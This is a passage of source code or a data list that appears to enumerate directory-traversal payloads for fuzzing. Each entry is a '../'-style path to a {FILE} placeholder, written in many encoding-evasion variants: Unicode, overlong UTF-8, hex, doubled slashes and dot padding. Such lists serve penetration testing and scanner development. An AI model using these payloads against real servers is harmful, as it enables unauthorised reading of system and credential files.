"true,..../..../..../..../..../{FILE}", + "true,..../..../..../..../..../..../{FILE}", + "true,..../..../..../..../..../..../..../{FILE}", + "true,..../..../..../..../..../..../..../..../{FILE}", + "true,....\\{FILE}", + "true,....\\....\\{FILE}", + "true,....\\....\\....\\{FILE}", + "true,....\\....\\....\\....\\{FILE}", + "true,....\\....\\....\\....\\....\\{FILE}", + "true,....\\....\\....\\....\\....\\....\\{FILE}", + "true,....\\....\\....\\....\\....\\....\\....\\{FILE}", + "true,....\\....\\....\\....\\....\\....\\....\\....\\{FILE}", + "true,........................................................................../{FILE}", + "true,........................................................................../../{FILE}", + "true,........................................................................../../../{FILE}", + "true,........................................................................../../../../{FILE}", + "true,........................................................................../../../../../{FILE}", + "true,........................................................................../../../../../../{FILE}", + "true,........................................................................../../../../../../../{FILE}", + "true,........................................................................../../../../../../../../{FILE}", + "true,..........................................................................\\{FILE}", + "true,..........................................................................\\..\\{FILE}", + "true,..........................................................................\\..\\..\\{FILE}", + "true,..........................................................................\\..\\..\\..\\{FILE}", + "true,..........................................................................\\..\\..\\..\\..\\{FILE}", + "true,..........................................................................\\..\\..\\..\\..\\..\\{FILE}", + "true,..........................................................................\\..\\..\\..\\..\\..\\..\\{FILE}", + "true,..........................................................................\\..\\..\\..\\..\\..\\..\\..\\{FILE}", + "true,..%u2215{FILE}", + "true,..%u2215..%u2215{FILE}", + "true,..%u2215..%u2215..%u2215{FILE}", + "true,..%u2215..%u2215..%u2215..%u2215{FILE}", + "true,..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}", + "true,..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}", + "true,..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}", + "true,..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}", + "true,%uff0e%uff0e/{FILE}", + "true,%uff0e%uff0e/%uff0e%uff0e/{FILE}", + "true,%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}", + "true,%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}", + "true,%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}", + "true,%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}", + "true,%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}", + "true,%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}", + "true,%uff0e%uff0e%u2215{FILE}", + "true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}", + "true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}", + "true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}", + "true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}", + "true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}", + "true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}", + "true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}", + "true,..%u2216{FILE}", + "true,..%u2216..%u2216{FILE}", + "true,..%u2216..%u2216..%u2216{FILE}", + "true,..%u2216..%u2216..%u2216..%u2216{FILE}", + "true,..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}", + "true,..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}", + "true,..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}", + "true,..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}", + "true,..%uEFC8{FILE}", + "true,..%uEFC8..%uEFC8{FILE}", + "true,..%uEFC8..%uEFC8..%uEFC8{FILE}", + "true,..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}", + "true,..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}", + "true,..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}", + "true,..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}", + "true,..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}", + "true,..%uF025{FILE}", + "true,..%uF025..%uF025{FILE}", + "true,..%uF025..%uF025..%uF025{FILE}", + "true,..%uF025..%uF025..%uF025..%uF025{FILE}", + "true,..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}", + "true,..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}", + "true,..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}", + "true,..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}", + "true,%uff0e%uff0e\\{FILE}", + "true,%uff0e%uff0e\\%uff0e%uff0e\\{FILE}", + "true,%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}", + "true,%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}", + "true,%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}", + "true,%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}", + "true,%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}", + "true,%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}", + "true,%uff0e%uff0e%u2216{FILE}", + "true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}", + "true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}", + "true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}", + "true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}", + "true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}", + "true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}", + "true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}", + "true,..0x2f{FILE}", + "true,..0x2f..0x2f{FILE}", + "true,..0x2f..0x2f..0x2f{FILE}", + "true,..0x2f..0x2f..0x2f..0x2f{FILE}", + "true,..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}", + "true,..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}", + "true,..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}", + "true,..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}", + "true,0x2e0x2e/{FILE}", + "true,0x2e0x2e/0x2e0x2e/{FILE}", + "true,0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}", + "true,0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}", + "true,0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}", + "true,0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}", + "true,0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}", + "true,0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}", + "true,0x2e0x2e0x2f{FILE}", + "true,0x2e0x2e0x2f0x2e0x2e0x2f{FILE}", + "true,0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}", + "true,0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}", + "true,0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}", + "true,0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}", + "true,0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}", + "true,0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}", + "true,..0x5c{FILE}", + "true,..0x5c..0x5c{FILE}", + "true,..0x5c..0x5c..0x5c{FILE}", + "true,..0x5c..0x5c..0x5c..0x5c{FILE}", + "true,..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}", + "true,..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}", + "true,..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}", + "true,..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}", + "true,0x2e0x2e\\{FILE}", + "true,0x2e0x2e\\0x2e0x2e\\{FILE}", + "true,0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}", + "true,0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}", + "true,0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}", + "true,0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}", + "true,0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}", + "true,0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}", + "true,0x2e0x2e0x5c{FILE}", + "true,0x2e0x2e0x5c0x2e0x2e0x5c{FILE}", + "true,0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}", + "true,0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}", + "true,0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}", + "true,0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}", + "true,0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}", + "true,0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}", + "true,..%c0%2f{FILE}", + "true,..%c0%2f..%c0%2f{FILE}", + "true,..%c0%2f..%c0%2f..%c0%2f{FILE}", + "true,..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}", + "true,..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}", + "true,..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}", + "true,..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}", + "true,..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}", + "true,%c0%2e%c0%2e/{FILE}", + "true,%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}", + "true,%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}", + "true,%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}", + "true,%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}", + "true,%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}", + "true,%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}", + "true,%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}", + "true,%c0%2e%c0%2e%c0%2f{FILE}", + "true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}", + "true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}", + "true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}", + "true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}", + "true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}", + "true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}", + "true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}", + "true,..%c0%5c{FILE}", + "true,..%c0%5c..%c0%5c{FILE}", + "true,..%c0%5c..%c0%5c..%c0%5c{FILE}", + "true,..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}", + "true,..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}", + "true,..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}", + "true,..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}", + "true,..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}", + "true,%c0%2e%c0%2e\\{FILE}", + "true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}", + "true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}", + "true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}", + "true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}", + "true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}", + "true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}", + "true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}", + "true,%c0%2e%c0%2e%c0%5c{FILE}", + "true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}", + "true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}", + "true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}", + "true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}", + "true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}", + "true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}", + "true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}", + "true,///%2e%2e%2f{FILE}", + "true,///%2e%2e%2f%2e%2e%2f{FILE}", + "true,///%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,\\\\\\%2e%2e%5c{FILE}", + "true,\\\\\\%2e%2e%5c%2e%2e%5c{FILE}", + "true,\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,..//{FILE}", + "true,..//..//{FILE}", + "true,..//..//..//{FILE}", + "true,..//..//..//..//{FILE}", + "true,..//..//..//..//..//{FILE}", + "true,..//..//..//..//..//..//{FILE}", + "true,..//..//..//..//..//..//..//{FILE}", + "true,..//..//..//..//..//..//..//..//{FILE}", + "true,..///{FILE}", + "true,..///..///{FILE}", + "true,..///..///..///{FILE}", + "true,..///..///..///..///{FILE}", + "true,..///..///..///..///..///{FILE}", + "true,..///..///..///..///..///..///{FILE}", + "true,..///..///..///..///..///..///..///{FILE}", + "true,..///..///..///..///..///..///..///..///{FILE}", + "true,..\\\\{FILE}", + "true,..\\\\..\\\\{FILE}", + "true,..\\\\..\\\\..\\\\{FILE}", + "true,..\\\\..\\\\..\\\\..\\\\{FILE}", + "true,..\\\\..\\\\..\\\\..\\\\..\\\\{FILE}", + "true,..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\{FILE}", + "true,..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\{FILE}", + "true,..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\{FILE}", + "true,..\\\\\\{FILE}", + "true,..\\\\\\..\\\\\\{FILE}", + "true,..\\\\\\..\\\\\\..\\\\\\{FILE}", + "true,..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}", + "true,..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}", + "true,..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}", + "true,..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}", + "true,..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}", + "true,./\\/./{FILE}", + "true,./\\/././\\/./{FILE}", + "true,./\\/././\\/././\\/./{FILE}", + "true,./\\/././\\/././\\/././\\/./{FILE}", + "true,./\\/././\\/././\\/././\\/././\\/./{FILE}", + "true,./\\/././\\/././\\/././\\/././\\/././\\/./{FILE}", + "true,./\\/././\\/././\\/././\\/././\\/././\\/././\\/./{FILE}", + "true,./\\/././\\/././\\/././\\/././\\/././\\/././\\/././\\/./{FILE}", + "true,.\\/\\.\\{FILE}", + "true,.\\/\\.\\.\\/\\.\\{FILE}", + "true,.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}", + "true,.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}", + "true,.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}", + "true,.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}", + "true,.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}", + "true,.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}", + "true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../{FILE}", + "true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../{FILE}", + "true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../{FILE}", + "true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../{FILE}", + "true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../{FILE}", + "true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../{FILE}", + "true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../{FILE}", + "true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../../{FILE}", + "true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\{FILE}", + "true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\{FILE}", + "true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\{FILE}", + "true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\{FILE}", + 